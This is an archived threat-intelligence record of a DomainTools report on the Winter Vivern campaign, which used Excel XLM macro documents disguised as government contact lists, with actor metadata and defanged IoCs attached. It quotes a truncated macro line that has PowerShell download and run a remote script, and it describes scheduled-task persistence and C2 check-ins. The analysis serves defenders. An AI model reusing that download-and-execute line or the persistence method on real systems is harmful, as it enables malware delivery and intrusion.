{
	"id": "6409cc18-5af2-4b1f-ba4b-7b3a2a9cfd0c",
	"created_at": "2026-04-06T00:13:09.643208Z",
	"updated_at": "2026-04-10T03:30:21.356656Z",
	"deleted_at": null,
	"sha1_hash": "38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f",
	"title": "Winter Vivern: Re-Crafted Government MalDocs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 450386,
	"plain_text": "Winter Vivern: Re-Crafted Government MalDocs\r\nBy Chad Anderson\r\nArchived: 2026-04-05 14:53:28 UTC\r\nWinter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple Languages\r\nExecutive Summary\r\nWhile parsing Microsoft Excel documents using XLM 4.0 macros, the DomainTools Research team came across a Lithuanian-language document innocuously titled “contacts”. The simple macro in this document dropped a slightly more complex PowerShell script that performed C2 communications with a domain that has been active since December 2020 and appeared on no industry-standard blocklists. The most recent domain serving documents was registered in April 2021, and DomainTools Research believes other domains used for short-term distribution may lead to further documents. Hunting on the macro and domain mentioned revealed documents targeting Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican. The DomainTools Research team colloquially refers to this as “Winter Vivern” due to the path used in C2 communication over the last several months.\r\nContext For Defenders\r\nXLM 4.0 macros, the precursor to VBA in Microsoft Office documents, continue to be a problem as malware authors leverage them to avoid detection. Well-crafted macros that span multiple cells and use obfuscation can often obscure adversary infrastructure from virus scanners and other tools. While tooling has come a long way in the last few years that XLM macros have been en vogue, the DomainTools Research team continues to hunt for new and novel ways that attackers hide domains in these documents.\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 1 of 6\r\nWe suggest anyone looking into a document containing XLM macros take a look at the excellent XLMMacroDeobfuscator tool to assist in parsing. However, be aware that there is currently a bug that breaks deobfuscation when multiple macros are in a single cell. This was the bug the DomainTools Research team was trying to solve while hunting for documents that failed in this way. As luck would have it, the project maintainer already has a fix in a testing branch, should you as a defender come across this problem in documents you are analyzing.\r\nThe Malicious Document\r\nThe initial Lithuanian-language document, titled vtas_kontaktai_2021_04_20.xls, contains the typical request to enable content if the document is not functioning properly. The document says it contains the “Contact Details of Municipal Administrations Departments for the Protection of the Rights of the Child”. This is a legitimate document that the government of Lithuania provides and can be found on Google, as seen below. However, the modified version includes a malicious XLM 4.0 macro that calls out to the domain secure-daddy[.]com. This same initial macro is present in all subsequent documents mentioned later in this writing as well.\r\nCALL(\"kernel32\",\"WinExec\",\"JCJ\",\"powershell -c \"\"iex (New-Object Net.Webclient).DownloadString( 'https://se\r\nWhen executing that string, another PowerShell script is pulled down and run, which in turn pulls down one of two scheduled task files depending on the Microsoft Windows version it has infected. These scheduled tasks regularly repeat the above pull from secure-daddy[.]com so that the script can keep itself updated. The script contains a simple push of all system information up to the C2, then checks at regular intervals for new commands, presumably capable of dropping another payload.\r\nAdditional Targeting\r\nExamining the origin of the document on VirusTotal, we can see that the initial document comes from the URL:\r\nhttps://securemanag[.]com/data/public/uploads/2017/08/vtas_kontaktai_2021_04_20.xls\r\nThis URL also serves up the Azerbaijani-language application-for-visas.xls and a generic Peace Institutions contact document in English. All documents contain the PowerShell script mentioned above. When hunting for anything calling out to the secure-daddy[.]com domain, we found the Italian-language Rassegna Documentazioni Dicastero per la Comunicazione.xls (first seen 2021-03-07) and the Cyprus-language document Ενημερωμένος κατάλογος.xls (first seen 2021-04-21), which form another set of contact-themed documents. All documents so far have had an author of “Admin” and contained a Cyrillic code page.\r\nSince December 2020, secure-daddy[.]com has also been involved in distributing documents from two URLs that would suggest earlier targeting of the Indian government and the Vatican:\r\nhttps://secure-daddy[.]com/mail.gov.in/iwc_static/c11n/allDomain/Documents/mealib/List%20of%20online%20datab\r\nhttps://secure-daddy[.]com/www.sdsofficium.va/portale/portalesdsext.nsf/\r\nAttacker Infrastructure\r\nExamining the attacker infrastructure, we found that neither domain was on an industry-standard blocklist, but that DomainTools predictive Risk Scoring algorithms did properly rate them as the highest possible risk for malware. While the initial C2 domain secure-daddy[.]com was registered in December 2020, the serving domain securemanag[.]com has only been active since April 2021. This indicates to us that the adversary is likely starting a new campaign, serving documents from this address and hiding their C2 behind infrastructure they’re reusing from before. Both domains are hosted on 3NT Solutions LLP, but are split between the older domain in Sweden and the latest in Estonia.\r\nExamining passive DNS, we can see that there has been a decent run of activity on the C2 domain, so presumably some of these documents have worked and more are out in the wild. Additionally, the SPF record authorizes a wide range of servers to send mail on the domain’s behalf and, ending in ~all (softfail), is set up as if the domain were still in transition. The newer, document-serving domain has a similar setup but only contains the hostinger[.]com portion in its SPF record. However, what is more interesting is that the IP address behind this domain was previously hosting centr-security[.]com. When searched for in VirusTotal, this reveals another document served up targeting Ukrainian-language speakers from the URL https://centr-security[.]com/mil.gov.ua/documents/stat/statistics-donbas-07042021.xls. It’s important to note that centr-security[.]com has already been placed on a blocklist, but also that this domain is spoofing the Council of European National Top-Level Domain Registrars (CENTR).\r\nConclusion\r\nThis campaign appears to have run largely undetected since around December 2020 with a wide range of targets and languages. As the scripts are unobfuscated and quite simple, we don’t see this being a complex APT-level campaign, as it doesn’t leverage any known tooling. However, we feel it’s always important to note that sophistication is not a requirement for success. Since this cluster of documents can’t be tied to any other campaign, attribution is difficult at this time and DomainTools Research is monitoring this as an independent cluster.\r\nIoCs\r\nDomains\r\ncentr-security[.]com\r\nsecure-daddy[.]com\r\nsecuremanage[.]com\r\nIP Addresses\r\n37[.]252[.]9[.]123\r\n37[.]252[.]5[.]133\r\nSource: https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/"
	],
	"report_names": [
		"winter-vivern-a-look-at-re-crafted-government-maldocs"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434389,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.pdf",
		"text": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.txt",
		"img": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.jpg"
	}
}